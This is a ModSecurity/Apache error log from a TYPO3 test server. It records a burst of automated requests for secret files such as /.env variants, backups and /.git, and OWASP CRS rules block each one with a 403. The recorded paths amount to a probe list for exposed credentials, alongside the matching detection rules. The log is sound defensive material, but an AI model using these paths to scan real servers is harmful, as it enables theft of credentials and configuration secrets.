[Fri Mar 20 15:01:18.500494 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLkGu3yPOFBRkxZtwyAAAAAA"]
[Fri Mar 20 15:01:18.500626 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLkGu3yPOFBRkxZtwyAAAAAA"]
[Fri Mar 20 15:01:18.500768 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab1TLkGu3yPOFBRkxZtwyAAAAAA"]
[Fri Mar 20 15:01:18.524808 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xAAAAAI"]
[Fri Mar 20 15:01:18.524955 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xAAAAAI"]
[Fri Mar 20 15:01:18.525103 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private/.env"] [unique_id "ab1TLvy1_WiwY9KfWu_4xAAAAAI"]
[Fri Mar 20 15:01:18.581425 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLm8zubx8zfwe9oW5PAAAAAU"]
[Fri Mar 20 15:01:18.581560 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLm8zubx8zfwe9oW5PAAAAAU"]
[Fri Mar 20 15:01:18.581703 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "ab1TLm8zubx8zfwe9oW5PAAAAAU"]
[Fri Mar 20 15:01:18.601408 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLhq8pDZXKMuYECLOYAAAAAk"]
[Fri Mar 20 15:01:18.601552 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLhq8pDZXKMuYECLOYAAAAAk"]
[Fri Mar 20 15:01:18.601734 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab1TLhq8pDZXKMuYECLOYAAAAAk"]
[Fri Mar 20 15:01:18.625333 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLmLvrbuE12wYiLe4NAAAABA"]
[Fri Mar 20 15:01:18.625467 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLmLvrbuE12wYiLe4NAAAABA"]
[Fri Mar 20 15:01:18.625631 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "ab1TLmLvrbuE12wYiLe4NAAAABA"]
[Fri Mar 20 15:01:18.649565 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLvy1_WiwY9KfWu_4xQAAAAI"]
[Fri Mar 20 15:01:18.649699 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLvy1_WiwY9KfWu_4xQAAAAI"]
[Fri Mar 20 15:01:18.649864 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_backup"] [unique_id "ab1TLvy1_WiwY9KfWu_4xQAAAAI"]
[Fri Mar 20 15:01:18.673643 2026] [authz_core:error] [pid 2815713] [client 162.158.86.142:13502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Fri Mar 20 15:01:18.697943 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLv9i5ZHhQgdGB68gIgAAAAg"]
[Fri Mar 20 15:01:18.698082 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLv9i5ZHhQgdGB68gIgAAAAg"]
[Fri Mar 20 15:01:18.698220 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "ab1TLv9i5ZHhQgdGB68gIgAAAAg"]
[Fri Mar 20 15:01:18.820065 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLknH70iMTzyPh3kWkwAAAAY"]
[Fri Mar 20 15:01:18.820203 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLknH70iMTzyPh3kWkwAAAAY"]
[Fri Mar 20 15:01:18.820340 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env2"] [unique_id "ab1TLknH70iMTzyPh3kWkwAAAAY"]
[Fri Mar 20 15:01:18.825245 2026] [authz_core:error] [pid 2815734] [client 162.158.86.254:13014] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:18.828335 2026] [authz_core:error] [pid 2817640] [client 162.158.86.254:13016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:18.840978 2026] [authz_core:error] [pid 2815712] [client 162.158.86.142:13510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:18.844311 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1uwAAAAE"]
[Fri Mar 20 15:01:18.844449 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1uwAAAAE"]
[Fri Mar 20 15:01:18.844584 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1uwAAAAE"]
[Fri Mar 20 15:01:18.850420 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLkGu3yPOFBRkxZtwyQAAAAA"]
[Fri Mar 20 15:01:18.850549 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLkGu3yPOFBRkxZtwyQAAAAA"]
[Fri Mar 20 15:01:18.850662 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLkGu3yPOFBRkxZtwyQAAAAA"]
[Fri Mar 20 15:01:18.851376 2026] [authz_core:error] [pid 2815713] [client 162.158.86.142:13502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Fri Mar 20 15:01:18.857153 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLv9i5ZHhQgdGB68gIwAAAAg"]
[Fri Mar 20 15:01:18.857290 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLv9i5ZHhQgdGB68gIwAAAAg"]
[Fri Mar 20 15:01:18.857408 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLv9i5ZHhQgdGB68gIwAAAAg"]
[Fri Mar 20 15:01:18.861058 2026] [authz_core:error] [pid 2815712] [client 162.158.86.142:13510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.production.bak
[Fri Mar 20 15:01:18.863843 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLmLvrbuE12wYiLe4NQAAABA"]
[Fri Mar 20 15:01:18.863963 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLmLvrbuE12wYiLe4NQAAABA"]
[Fri Mar 20 15:01:18.864076 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLmLvrbuE12wYiLe4NQAAABA"]
[Fri Mar 20 15:01:18.874619 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vAAAAAE"]
[Fri Mar 20 15:01:18.874735 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vAAAAAE"]
[Fri Mar 20 15:01:18.874860 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLjQ9Th-2Y9b0JRd1vAAAAAE"]
